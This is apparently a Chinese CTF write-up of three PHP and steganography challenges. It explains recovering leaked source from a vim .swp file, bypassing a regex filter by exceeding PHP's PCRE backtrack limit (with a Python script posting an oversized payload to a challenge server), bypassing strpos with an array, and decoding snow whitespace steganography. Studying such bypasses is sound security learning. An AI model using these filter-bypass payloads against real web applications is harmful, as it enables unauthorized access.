gift php plus
这题就比较有意思了(个屁)
首先提示 Do you know .swp file?
然后用WangYiHang大佬的工具扫一下后台,找到.index.php.swp这个文件,然后扔到Linux里用vi恢复
vi -r 文件名 #swp文件是vi不正常退出产生的,用-r可以恢复
然后审计代码
<?php
function areyouok($greeting){
return preg_match('/Merry.*Christmas/is',$greeting);
}
$greeting=@$_POST['greeting'];
if(!is_array($greeting)){
if(!areyouok($greeting)){
if(strpos($greeting,'Merry Christmas')!==false){
echo 'Merry Christmas. '.'flag{xxxxxx}';
}else{
echo 'Do you know .swp file?';
}
}else{
echo 'Do you know PHP?';
}
}
?>
代码很简单,绕过条件也很清晰
1.传入不为数组
2.不匹配 /Merry.*Christmas/is
这个正则
3.strpos($greeting,'Merry Christmas')
不等于fales
也就是说传入的参数要带有Merry Christmas
又要不满足/Merry.*Christmas/
这个正则,一开始也是毫无头绪,后来在大佬的提示下,知道了利用php的PCRE回溯次数限制绕过这个正则。
具体的因为php的回溯是有上限的
var_dump(ini_get('pcre.backtrack_limit'));//1000000
如果超过这个上限就返回一个false。也是就说,在匹配到*号时,他会匹配任意个字符,那么我们传入1000000个字符,然后他匹配全部的字符后,要开始验证下一个匹配,这个体力就是C,然后他开始从最后一个往前回溯,这里有1000000个字符+Christmas然后当他回溯1000000个后没匹配到C那么他就返回一个False。就饶过了。
这里在写的时候还碰到了一个问题,就是strpos()
函数,当Merry Christmas+100w个字符传入后,strpos()应该匹配的是他的位置,然而Merry Christmas他在首位所以应该返回0,在弱比较下0应该等于false,想了很久才发现这里是强比较。嗯wcsl。。。
附一个绕过脚本
import requests
url='http://106.75.66.87:8888/'
longStr=''
for i in range(1000000):
longStr+='a'
greeting={
'greeting':'Merry Christmas'+longStr
}
res = requests.post(url=url,data=greeting)
print(res.text)
gift php
这里的代码和上面的式样的,就是没有判断数组,strpos()碰到数组的时候会返回false,所以传一个数组即可绕过
gift
也是和群里的大佬交流后得到提示,这里用的是html隐写技术,snow隐写,题目提示钥匙上刻了题目名呢。发现key就是title gift。然后丢到snow解密网站揭秘一下就iu好了。
snow解密连接